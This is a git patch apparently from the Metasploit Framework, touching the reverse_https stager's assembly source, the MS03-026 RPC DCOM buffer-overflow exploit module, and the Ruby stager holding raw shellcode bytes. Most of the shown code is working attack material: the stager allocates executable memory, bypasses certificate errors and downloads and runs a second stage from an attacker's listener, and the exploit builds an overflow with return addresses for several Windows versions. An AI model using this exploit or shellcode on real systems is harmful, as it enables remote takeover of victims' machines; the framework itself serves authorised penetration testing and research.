From cd2760f2c21f19228d214315036d33eb5a2bd51f Mon Sep 17 00:00:00 2001 From: HD Moore Date: Sat, 3 Apr 2010 13:53:35 +0000 Subject: [PATCH] Bug fixes and size improvements for the reverse_https stager git-svn-id: file:///home/svn/framework3/trunk@9001 4d416f70-5f16-0410-b530-b9f4589650da --- .../x86/src/block/block_reverse_https.asm | 25 ++++---- .../exploits/windows/dcerpc/ms03_026_dcom.rb | 61 ++++++++++--------- .../payloads/stagers/windows/reverse_https.rb | 24 ++++---- 3 files changed, 56 insertions(+), 54 deletions(-) diff --git a/external/source/shellcode/windows/x86/src/block/block_reverse_https.asm b/external/source/shellcode/windows/x86/src/block/block_reverse_https.asm index ce0aa51861..aaf2adcc68 100644 --- a/external/source/shellcode/windows/x86/src/block/block_reverse_https.asm +++ b/external/source/shellcode/windows/x86/src/block/block_reverse_https.asm @@ -7,8 +7,7 @@ ; Input: EBP must be the address of 'api_call'. ; Output: EDI will be the socket for the connection to the server -; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0) - +; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0) load_wininet: push 0x0074656e ; Push the bytes 'wininet',0 onto the stack. push 0x696e6977 ; ... @@ -69,11 +68,11 @@ httpopenrequest: mov esi, eax ; hHttpRequest httpsendrequest: - xor ebx, ebx - push ebx ; optional length - push ebx ; optional - push ebx ; dwHeadersLength - push ebx ; headers + xor edi, edi + push edi ; optional length + push edi ; optional + push edi ; dwHeadersLength + push edi ; headers push esi ; hHttpRequest push 0x7B18062D ; hash( "wininet.dll", "HttpSendRequestA" ) call ebp @@ -84,9 +83,11 @@ check_ssl: ; In the case of an invalid certificate authority, we have to wait until the error occurs, ; set an option to disable it, then try it all over again. This wastes shellcode space, ; but its required to use this payload without a valid signed cert. - push 0x5DE2C5AA ; hash( "kernel32.dll", "GetLastError" ) - call ebp - cmp al, 0x0d ; ERROR_INTERNET_INVALID_CA (0x2f0d) +; push 0x5DE2C5AA ; hash( "kernel32.dll", "GetLastError" ) +; call ebp + + ; The error message is left in ECX + cmp cl, 0x0d ; ERROR_INTERNET_INVALID_CA (0x2f0d) jne failure ; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) ); @@ -121,7 +122,7 @@ allocate_memory: push byte 0x40 ; PAGE_EXECUTE_READWRITE push 0x1000 ; MEM_COMMIT push 0x00400000 ; Stage allocation (8Mb ought to do us) - push ebx ; NULL as we dont care where the allocation is (zero'd from the prev function) + push edi ; NULL as we dont care where the allocation is (zero'd from the prev function) push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" ) call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); @@ -133,7 +134,7 @@ download_prep: download_more: push edi ; &bytesRead - push ebx ; buffer as the length, seems to work (Win7) + push 8192 ; read length push ebx ; buffer push esi ; hRequest push 0xE2899612 ; hash( "wininet.dll", "InternetReadFile" ) diff --git a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb index 895b129344..67f0da36fb 100644 --- a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb +++ b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -23,7 +23,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Microsoft RPC DCOM Interface Overflow', 'Description' => %q{ This module exploits a stack overflow in the RPCSS service, this vulnerability - was originally found by the Last Stage of Delirium research group and has been + was originally found by the Last Stage of Delirium research group and has been widely exploited ever since. This module can exploit the English versions of Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :) }, @@ -47,16 +47,16 @@ class Metasploit3 < Msf::Exploit::Remote 'Space' => 880, 'MinNops' => 300, 'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e", - 'StackAdjustment' => -3500, + 'StackAdjustment' => -3500 }, - 'Targets' => + 'Targets' => [ # Target 0: Universal - [ + [ 'Windows NT SP3-6a/2000/XP/2003 Universal', { 'Platform' => 'win', - 'Rets' => + 'Rets' => [ 0x77f33723, # Windows NT 4.0 SP6a (esp) 0x7ffde0eb, # Windows 2000 writable address + jmp+0xe0 @@ -76,27 +76,27 @@ class Metasploit3 < Msf::Exploit::Remote # Common vulnerability scanning tools report port 445/139 # due to how they test for the vulnerability. Remap this # back to 135 for automated exploitation - + rport = datastore['RPORT'].to_i if ( rport == 139 or rport == 445 ) datastore['RPORT'] = 135 end - + true end - + def exploit connect print_status("Trying target #{target.name}...") - + handle = dcerpc_handle('4d9f4ab8-7d1c-11cf-861e-0020af6e7c57', '0.0', 'ncacn_ip_tcp', [datastore['RPORT']]) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") - + # Carefully create the combination of addresses and code for cross-os exploitation xpseh = rand_text_alphanumeric(360, payload_badchars) - + # Jump to [esp-4] - (distance to shellcode) jmpsc = "\x8b\x44\x24\xfc" + # mov eax,[esp-0x4] @@ -117,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote xpseh[ 306, 2 ] = Rex::Arch::X86.jmp_short('$+8') xpseh[ 310, 4 ] = [ target['Rets'][3] ].pack('V') xpseh[ 314, jmpsc.length ] = jmpsc - + # # NT 4.0 SP3/SP4 work the same, just use a pop/pop/ret that works on both # NT 4.0 SP5 is a jmp eax to avoid a conflict with SP3/SP4 @@ -136,30 +136,30 @@ class Metasploit3 < Msf::Exploit::Remote # sits just below these overwrites... # - nt4sp3jmp = Rex::Arch::X86.jmp_short("$+#{12 + 5}") + - rand_text(2, payload_badchars) + nt4sp3jmp = Rex::Arch::X86.jmp_short("$+#{12 + 5}") + + rand_text(2, payload_badchars) nt4sp5jmpback = "\xe9" + [ ((5 + 4 + payload.encoded.length) * -1) ].pack('V') nt4sp3jmpback = "\xe9" + [ ((12 + 5 + 5 + payload.encoded.length) * -1) ].pack('V') - ntshiz = - nt4sp3jmp + - [ target['Rets'][6] ].pack('V') + + ntshiz = + nt4sp3jmp + + [ target['Rets'][6] ].pack('V') + [ target['Rets'][5] ].pack('V') + - nt4sp5jmpback + + nt4sp5jmpback + nt4sp3jmpback # Pad to the magic value of 118 bytes - ntshiz += rand_text(118 - ntshiz.length, payload_badchars) - + ntshiz += rand_text(118 - ntshiz.length, payload_badchars) + # Create the evil UNC path used in the overflow - uncpath = - Rex::Text.to_unicode("\\\\") + + uncpath = + Rex::Text.to_unicode("\\\\") + make_nops(32) + - + # When attacking NT 4.0, jump over 2000/XP return Rex::Arch::X86.jmp_short(16) + Rex::Arch::X86.jmp_short(25) + - + [ target['Rets'][2] ].pack('V') + # Return address for 2000 (ebx) [ target['Rets'][0] ].pack('V') + # Return address for NT 4.0 SP6 (esi) [ target['Rets'][1] ].pack('V') + # Writable address on 2000 and jmp for NT 4.0 @@ -172,8 +172,8 @@ class Metasploit3 < Msf::Exploit::Remote make_nops(4) + Rex::Arch::X86.jmp_short(4) + rand_text(4, payload_badchars) + - payload.encoded + - ntshiz + + payload.encoded + + ntshiz + xpseh + Rex::Text.to_unicode("\\\x00") @@ -184,7 +184,7 @@ class Metasploit3 < Msf::Exploit::Remote NDR.long(0) + NDR.long(0) + - rand_text(16) + + rand_text(16) + NDR.long(0) + NDR.long(0) + @@ -212,7 +212,7 @@ class Metasploit3 < Msf::Exploit::Remote NDR.long(1) + NDR.long(1) + NDR.long(rand(0xFFFFFFFF)) - + print_status('Sending exploit ...') begin dcerpc_call(0, stubdata) @@ -220,7 +220,8 @@ class Metasploit3 < Msf::Exploit::Remote end handler - disconnect + disconnect end end + diff --git a/modules/payloads/stagers/windows/reverse_https.rb b/modules/payloads/stagers/windows/reverse_https.rb index 6c27708560..e890cef031 100644 --- a/modules/payloads/stagers/windows/reverse_https.rb +++ b/modules/payloads/stagers/windows/reverse_https.rb @@ -34,7 +34,7 @@ module Metasploit3 { 'Offsets' => { - 'EXITFUNC' => [ 295, 'V' ], + 'EXITFUNC' => [ 289, 'V' ], 'LPORT' => [ 190, 'v' ], # Not a typo, really little endian }, 'Payload' => @@ -49,18 +49,18 @@ module Metasploit3 "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + "\x68\x6E\x65\x74\x00\x68\x77\x69\x6E\x69\x89\xE6\x54\x68\x4C\x77" + "\x26\x07\xFF\xD5\x31\xFF\x57\x57\x57\x57\x56\x68\x3A\x56\x79\xA7" + - "\xFF\xD5\xEB\x64\x5B\x31\xC9\x51\x51\x6A\x03\x51\x51\x68\x5C\x11" + - "\x00\x00\x53\x50\x68\x57\x89\x9F\xC6\xFF\xD5\xEB\x4D\x59\x31\xD2" + + "\xFF\xD5\xEB\x5E\x5B\x31\xC9\x51\x51\x6A\x03\x51\x51\x68\x5C\x11" + + "\x00\x00\x53\x50\x68\x57\x89\x9F\xC6\xFF\xD5\xEB\x47\x59\x31\xD2" + "\x52\x68\x00\x32\xE0\x84\x52\x52\x52\x51\x52\x50\x68\xEB\x55\x2E" + - "\x3B\xFF\xD5\x89\xC6\x31\xDB\x53\x53\x53\x53\x56\x68\x2D\x06\x18" + - "\x7B\xFF\xD5\x85\xC0\x75\x36\x68\xAA\xC5\xE2\x5D\xFF\xD5\x3C\x0D" + - "\x75\x24\x68\x80\x33\x00\x00\x89\xE0\x6A\x04\x50\x6A\x1F\x56\x68" + - "\x75\x46\x9E\x86\xFF\xD5\xEB\xCD\xEB\x45\xE8\xAE\xFF\xFF\xFF\x2F" + - "\x31\x32\x33\x34\x35\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x40\x68" + - "\x00\x10\x00\x00\x68\x00\x00\x40\x00\x53\x68\x58\xA4\x53\xE5\xFF" + - "\xD5\x93\x53\x53\x89\xE7\x57\x53\x53\x56\x68\x12\x96\x89\xE2\xFF" + - "\xD5\x85\xC0\x74\xD1\x8B\x07\x01\xC3\x85\xC0\x75\xE9\x58\xC3\xE8" + - "\x50\xFF\xFF\xFF" + "\x3B\xFF\xD5\x89\xC6\x31\xFF\x57\x57\x57\x57\x56\x68\x2D\x06\x18" + + "\x7B\xFF\xD5\x85\xC0\x75\x30\x80\xF9\x0D\x75\x24\x68\x80\x33\x00" + + "\x00\x89\xE0\x6A\x04\x50\x6A\x1F\x56\x68\x75\x46\x9E\x86\xFF\xD5" + + "\xEB\xD3\xEB\x49\xE8\xB4\xFF\xFF\xFF\x2F\x31\x32\x33\x34\x35\x00" + + "\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x40\x68\x00\x10\x00\x00\x68\x00" + + "\x00\x40\x00\x57\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x53\x89\xE7" + + "\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF\xD5\x85" + + "\xC0\x74\xCD\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3\xE8\x52\xFF" + + "\xFF\xFF" } )) end